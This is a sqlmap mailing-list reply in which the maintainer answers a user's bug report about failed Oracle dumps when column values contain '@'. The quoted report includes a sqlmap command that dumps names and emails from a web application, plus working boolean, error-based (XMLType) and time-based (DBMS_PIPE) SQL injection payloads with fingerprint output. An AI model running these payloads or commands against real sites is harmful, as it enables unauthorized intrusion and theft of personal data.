Re: [sqlmap-users] problem with oracle dump if column contents contain @
From: Miroslav S. <mir...@gm...> - 2011-07-23 06:02:26
hi 'Little Piggy'. could you please update and retry?

kr

On Sat, Jul 23, 2011 at 3:45 AM, This LittlePiggy <thi...@ho...> wrote:
> When using sqlmap/1.0-dev (r4277)
> ./sqlmap.py -v 4 -u
> 'http://www.example.com/comunity/artickles_details.php?id=190' -D BELCH -T
> FELATORS -C FNAME,EMAIL --dump
> banner: 'Oracle Database 11g Release 11.2.0.1.0 - 64bit Production'
> Place: GET
> Parameter: id
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: id=190 AND 9035=9035
> Type: error-based
> Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
> Payload: id=190 AND 4286=(SELECT
> UPPER(XMLType(CHR(60)||CHR(58)||CHR(103)||CHR(111)||CHR(114)||CHR(58)||(SELECT
> (CASE WHEN (4286=4286) THEN 1 ELSE 0 END) FROM
> DUAL)||CHR(58)||CHR(122)||CHR(113)||CHR(99)||CHR(58)||CHR(62))) FROM DUAL)
> Type: AND/OR time-based blind
> Title: Oracle AND time-based blind
> Payload: id=190 AND
> 6019=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(88)||CHR(82)||CHR(115),5)
> ---
> [21:18:48] [INFO] the back-end DBMS is Oracle
> web server operating system: Linux CentOS 5
> web application technology: Apache 2.2.3, PHP 5.3.5
> back-end DBMS: Oracle
>
> If any columns selected contain an @, the dump fails with
> [21:42:10] [WARNING] possible server trimmed output detected (due to its
> length): part-of-field-before-at-sign" (not a Name)
> Error at line 1
> ORA-06512: at "SYS.XMLTYPE", line 310
> ORA-06512: at line 1 in <b>/var/www/html/inc/details_inc.php
>
> suggestions?

--
Miroslav Stampar (@stamparm)
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B